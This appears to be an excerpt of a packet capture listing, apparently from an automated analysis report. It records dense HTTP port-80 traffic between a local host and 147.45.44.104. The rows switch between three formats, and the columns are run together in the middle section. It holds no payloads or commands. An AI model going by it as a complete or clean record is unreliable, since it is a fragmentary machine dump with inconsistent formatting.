Oct 8, 2024 03:30:54.873511076 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873516083 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873550892 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.934465885 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.934500933 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.934533119 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.934550047 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.934568882 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.934571981 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.934603930 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.935177088 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935200930 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935218096 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935235023 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935237885 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.935254097 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935261011 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.935307980 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.935496092 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935560942 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935614109 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935631037 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935642004 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.935647964 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.935683012 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.936301947 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936319113 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936336040 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936353922 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936353922 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.936369896 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936384916 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.936398983 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.936433077 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.937298059 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937314987 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937330961 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937350035 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937350988 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.937366962 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937383890 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.937388897 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.937414885 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.938249111 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938265085 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938282967 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938301086 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938301086 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.938318014 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938335896 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.938343048 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.938366890 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.939265013 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.939291000 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.939308882 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.939311981 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.939327955 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.939343929 CEST  80           49730      147.45.44.104  192.168.2.4
                                                  Oct 8, 2024 03:30:54.939361095 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.939374924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.939407110 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940176964 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940193892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940232038 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940234900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940251112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940269947 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940284014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.940287113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.940319061 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941143990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941191912 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941389084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941406012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941423893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941438913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941454887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941456079 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941473007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.941494942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.941525936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942264080 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942626953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942642927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942660093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942676067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942676067 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942701101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942712069 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942724943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942742109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942750931 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.942759037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.942787886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943552971 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943569899 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943588018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943603039 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943633080 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:54.943639040 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943656921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:54.943702936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.024528980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024667978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024684906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.024734020 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025125980 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025154114 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025168896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025175095 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025216103 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025226116 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025243044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025266886 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025283098 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.025294065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.025331020 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026204109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026218891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026236057 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026252031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026266098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026295900 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026324034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026392937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026408911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026434898 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026437044 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026453018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026469946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026480913 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026493073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026520014 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026541948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026560068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026587009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026587009 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026607037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026659966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026719093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026736021 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026751041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026765108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026768923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026787043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026801109 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026832104 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.026875019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026890993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026899099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026906967 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026915073 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026923895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026940107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026946068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.026995897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027026892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027334929 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027352095 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027362108 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027399063 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027414083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027416945 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027431965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.027448893 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.027482986 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028076887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028105974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028121948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028155088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028265953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028281927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028297901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028314114 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028316975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028350115 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028459072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028512001 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.028520107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028537035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028553963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.028584957 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029616117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029633045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029649019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029668093 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029697895 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029732943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029748917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029764891 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029772043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029803038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029819012 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029819965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029839993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029840946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029856920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029874086 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029875040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029891014 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029908895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.029911041 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.029948950 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030215979 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030231953 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030247927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030275106 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030286074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030286074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030292034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030313015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030329943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030344963 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030359030 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030369043 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030376911 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030396938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030420065 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030738115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030755043 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030772924 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030791044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030822992 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030855894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030872107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030889034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030904055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030922890 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030942917 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.030956984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030972958 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.030987978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031004906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031016111 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031022072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031039000 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031054974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031058073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031070948 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031076908 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031119108 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031501055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031517982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031533003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031559944 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031563044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031577110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031594038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031605005 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031611919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031630039 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031748056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031764984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031780958 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031795025 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031799078 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031824112 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031826019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031845093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031861067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031877041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031878948 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031894922 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031903982 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031910896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031929016 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.031936884 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.031980991 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.032458067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032474995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032493114 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032517910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.032826900 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032845974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032864094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.032872915 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.032905102 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.116501093 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116542101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116559982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116575956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116591930 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116590977 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.116611004 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116620064 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.116631031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116646051 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.116650105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.116683960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.116915941 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.117055893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.117070913 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.117088079 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.117104053 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.117105007 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.117126942 CEST8049730147.45.44.104192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:30:55.117130995 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117167950 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117171049 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117186069 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117201090 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117218018 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117225885 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117235899 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117269993 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117280006 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117319107 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117320061 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117336035 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117352009 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117367029 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117383003 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117388010 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117394924 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117419004 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117449999 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117453098 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117465019 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117480040 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117503881 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117506981 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117522955 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117537975 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117547989 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
Oct 8, 2024 03:30:55.117558956 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117574930 CEST | 80 | 49730 | 147.45.44.104 | 192.168.2.4
Oct 8, 2024 03:30:55.117583036 CEST | 49730 | 80 | 192.168.2.4 | 147.45.44.104
